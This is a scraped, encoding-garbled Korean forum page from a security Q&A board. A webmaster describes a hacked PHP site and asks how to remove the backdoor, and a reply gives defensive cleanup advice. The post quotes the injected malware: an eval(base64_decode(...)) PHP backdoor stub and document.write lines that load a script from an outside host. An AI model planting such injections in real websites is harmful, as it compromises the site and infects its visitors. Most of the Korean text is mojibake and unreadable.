Å©·¡Å· ÇÇÇØ

 423, 4/22 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   basscraft
   ¹éµµ¾î °ü·Ã ¹®ÀÇ

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_recover&no=473 [º¹»ç]


ȸ»ç¿¡¼­ È£½ºÆÃÇÏ°í ÀÖ´Â ¼­¹ö¿¡ ÇØÅ·À» ´çÇؼ­
¼Ò½º°¡ ¾û¸ÁÀÌ µÇ¾ú½À´Ï´Ù.

°ÅÀÇ 10³â ÀüÂë php·Î °³¹ßµÈ »çÀÌÆ®ÀÔ´Ï´Ù.
OS´Â ¸®´ª½º ÀÔ´Ï´Ù.

È®ÀÎÇØ º¸´Ï php ÆÄÀÏ ¸Ç óÀ½¿¡

<?php eval(base64_decode('aWYoIWZ1b... »ý·«...XSkpOw==')); ?>

ÀÌ·± ¼Ò½º°¡ ÀÎÁ§¼ÇµÇ¾î ÀÖ¾ú½À´Ï´Ù.
find ¸í·ÉÀ¸·Î 'eval(base64_decode(' ¹®ÀÚ¿­À» Æ÷ÇÔÇÑ ¼Ò½º¸¦ ã¾Æº¸¾Ò´õ´Ï
Æú´õº°·Î index.php ¶Ç´Â index*.php  µî ÆÄÀϵ鿡 ÀÎÁ§¼ÇµÇ¾î ÀÖ½À´Ï´Ù.

Ãß°¡·Î .js, .html ÆÄÀϵ鿡µµ

document.write('<script src=http://chefs.yoursecretchefs.com/images/gifimg.php ><\/script>');
document.write('<script src=http://chefs.yoursecretchefs.com/images/gifimg.php ><\/script>')
;document.write('<script src=http://chefs.yoursecretchefs.com/images/gifimg.php ><\/script>');

ÀÌ·± ³»¿ëµéÀÌ ÁÖÀԵǾî ÀÖ½À´Ï´Ù.
°ü¸®¸¦ Á¦´ë·Î ¸øÇÏ°í À־ ¼Ò½ºµµ ¹é¾÷ÀÌ ¾ÈµÈ »óÅ -0-;;;;
³ë°¡´Ù¶óµµ ÀÏÀÏÈ÷ ã¾Æ¼­ Áö¿ì¸é µÇ°ÚÁö¸¸

¹®Á¦´Â ÀÎÁ§¼ÇµÈ ¼Ò½ºÁß ÀϺδ Áß°£ºÎºÐ ÀÌÈÄ ¼Ò½º°¡ ¹¶ÅÖ Àß·Á¹ö¸° °ÍµéÀÌ Á¸ÀçÇؼ­
º¹±¸°¡ ºÒ°¡´ÉÇÑ »óÅÂÀÔ´Ï´Ù.(¿À·¡µÈ ¼Ò½º¸¦ ã¾Æ¼­ º¹±¸ÇÏ°í ÀÖ´ÂÁß...)
º¹±¸¸¦ ´Ù ÇÑ´Ù°í Çصµ ¹éµµ¾î °°Àº°Ô Á¸ÀçÇؼ­ ¶Ç´Ù½Ã µé¾î¿Ã °Í °°¾Æ¼­

¾î´À»çÀÌÆ®¿¡¼­ º» È®ÀÎ ¹æ¹ýÀ¸·Î È®ÀÎÇØ º¸´Ï

[aaa@xxx dev]$ find /dev -type f -exec ls -l {} \;
-rw-r--r--  1 root root 196608  2¿ù 27 04:47 /dev/.udev.tdb

ÀÌ·± °á°ú°¡ ÀÖ½À´Ï´Ù.
Àú°Ô ¹éµµ¾î ¸Â´ÂÁö...

´çÀå ´Ù½Ã ¼³Ä¡ÇÏ°í ½ÍÁö¸¸
ÀÏ´Ü À̹ø ¹®Á¦¸¸ ¾î¶»°Ô ³Ñ±â°í
»çÀÌÆ® ¸®´º¾óÀ» Çϱâ·Î ÀáÁ¤ ÇÕÀÇµÈ »óÅÂÀÔ´Ï´Ù.

Á¶¾ðÁ» ºÎŹµå¸³´Ï´Ù.

1. ÃßÃøµÇ´Â ÇØÅ·ÀÇ ¹æ¹ý
2. ÇØÅ·ÀÇ ¸ñÀû ¿¹»óµÇ´Â ÇÇÇØ(ȸ»ç ³», ¿ÜºÎ)
3. ¼Ò½º º¹±¸½Ã À¯ÀÇÇÒ Á¡
4. ¹éµµ¾î Á¦°Å ¹× ½Ã½ºÅÛ Á¤»óÈ­¿¡ ´ëÇÑ Á¶¾ð

Áú¹®ÀÌ ³Ê¹« ¸¹½À´Ï´Ù¸¸...
°³º° Ç׸ñÀÌ¶óµµ ´äº¯ÁÖ½Ã¸é º¹¹ÞÀ¸½Ç ²®´Ï´Ù ^^

  Hit : 4870     Date : 2010/03/03 10:00



    
¸Û¸Û 1. À§ Á¤º¸¸¸À¸·Î´Â ÃßÃøÇϱâ Èûµå³ª ÁÖ·Î À¥ÇØÅ·ÀÌ ¸¹½À´Ï´Ù. ÆÄÀÏÀÌ º¯°æµÈ ½Ã°£¿¡ ÇØ´çÇÏ´Â À¥ ·Î±×¸¦ ºÐ¼®ÇØ º¸¼¼¿ä.
2. Script°¡ »ðÀÔµÈ °ÍÀ¸·Î º¸¾Æ Ãß°¡ÀûÀÎ Client Àå¾Ç ½Ãµµ°¡ ¿¹»óµË´Ï´Ù. IE ºê¶ó¿ìÁ®À§ Ãë¾àÁ¡À»
ÀÌ¿ëÇÏ¿© À¥ »çÀÌÆ®¸¦ ¹æ¹®ÇÏ´Â ´Ù¸¥ Windows »ç¿ëÀÚµéÀ» Ãß°¡ Àå¾ÇÇÏ´Â °ÍÀ» ¸»ÇÕ´Ï´Ù.
3. eval ¿Ü¿¡µµ system, exec, passthru, popen ÇÔ¼ö ¶ÇÇÑ ¹éµµ¾î·Î »ç¿ë °¡´ÉÇÏ´Ï ÇÔ²² °Ë»öÇغ¸¼¼¿ä
4. Å©·¡Å·À» ¾ß±âÇÑ Ãë¾àÁ¡À» ãÁö ¸øÇÏ¸é º¹±¸ ÈÄ¿¡µµ Àç°¨¿° µÉ °¡´É¼ºÀÌ ³ô½À´Ï´Ù.
Script¸¦ ½É´Â ÆÐÅÏÀº ¿ú(ÀÚµ¿ °ø°Ý)¿¡ ÀÇÇÑ °ø°ÝÀÏ °¡´É¼ºÀÌ Å©±â ¶§¹®ÀÔ´Ï´Ù.
iptables¸¦ ÀÌ¿ëÇÑ ¹æÈ­º® Á¤Ã¥ ¼³Á¤ ¶ÇÇÑ °ø°Ý ¹æ¾î¿¡ µµ¿òÀÌ µÉ °ÍÀÔ´Ï´Ù.
(outbounding -¾È¿¡¼­ ¹ÛÀ¸·Î ³ª°¡´Â- ÆÐŶ Â÷´Ü µî)
5. ´äº¯ ¾È ÇÏ¸é º¹ ¸ø ¹Þ´Â°Ç°¡¿ä? ^^
2010/03/09  
363   UDP °ø°Ý¿¡ ´ëÇؼ­....Ãß°¡Áú¹®ÀÔ´Ï´Ù..[1]     dnflwlq1
05/06 3794
362   °øÀ¯±â¸¦ ÅëÇÑ ¿ø°ÝÁ¶Á¾À» ´çÇÏ°í ÀÖ´Â °Í °°½À´Ï´Ù[2]     have9208
05/05 4239
361   UDP °ø°Ý¿¡ ´ëÇؼ­[3]     dnflwlq1
05/03 5318
360   Àú±â.. ÇØÅ·À»´çÇÞ½À´Ï´Ù..[3]     intmain1202
04/12 3855
359 ºñ¹Ð±ÛÀÔ´Ï´Ù  ÇØÅ·À» ´çÇߴµ¥... ¾î¶»°Ô ´ëóÇؾßÇÒÁö ¸ð¸£°Ú½À´Ï´Ù.     parkjsjo
04/06 1
358   Á» µµ¿ÍÁÖ¼¼¿ä~Çü´Ôµé[3]     ±è¿µÁØ
03/30 3038
357   2010³â ¿¡´Â ÇØÅ·´ëȸ°¡ ¾î¶²°Ô ¿­¸®³ª¿ä?[1]     condors0
03/29 3518
356   ³Ýº¿ÇØÅ·..[9]     dbswlgnscjsw
03/18 4637
  ¹éµµ¾î °ü·Ã ¹®ÀÇ[1]     basscraft
03/03 4869
354   Çü´Ôµé[4]     anmgod
02/23 3680
353   Çü´Ôµé netstatÇؼ­ 8080¶ß´Âµ¥¾îÄÉ¿ä Æ÷¸ËµµÇ޴µ¥[14]     anmgod
02/22 4920
352   Çüµé Áú¹®ÇÒ°ÔÀÖ¾î¿ä !![7]     dkalwhs12
02/21 3396
351   ½ºÅäÄ¿°¡ Á¦ ÄÄÀ» ÇØÅ·ÇÏ´Â°Í °°¾Æ¿ä[14]     ¸ÞÅÚ
02/11 5222
350   À©µµ¿ì»ç¿ëÁß Ã¢ÀÌ ¶¸´Ù°¡ »ç¶óÁý´Ï´Ù[4]     milkily
02/07 3690
349   ¹«ÇÑÀçºÎÆÃ[7]     ½È¾î ³»°¡ÇÒ²¨¾ß
02/04 4048
348   À̹ø¿¡ ȸ»ç À¥ÆäÀÌÁö°¡ ÇØÅ·´çÇÑ°Í °°½À´Ï´Ù.[3]     rahisis
02/04 3329
347   ÇÁ·Î·¿ÇØÅ·Áß°íÀåÁú¹®ÀÌ¿ä[1]     tolta
01/16 4653
346   exeÆÄÀÏ ½ÇÇà ¿¡·¯(º¹±¸¹æ¹ý ±ÞÇØ¿ä!)[2]     cjusanghyun
01/06 4040
345   ÃÖ±Ù ddos °ø°Ý »çÅÂ.[1]     kindgs01
12/28 3725
344   ¾ó¸¶Àü¿¡ ÇØÅ· ´çÇؼ­...[3]     kindgs01
12/28 3405
[1][2][3] 4 [5][6][7][8][9][10]..[22]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org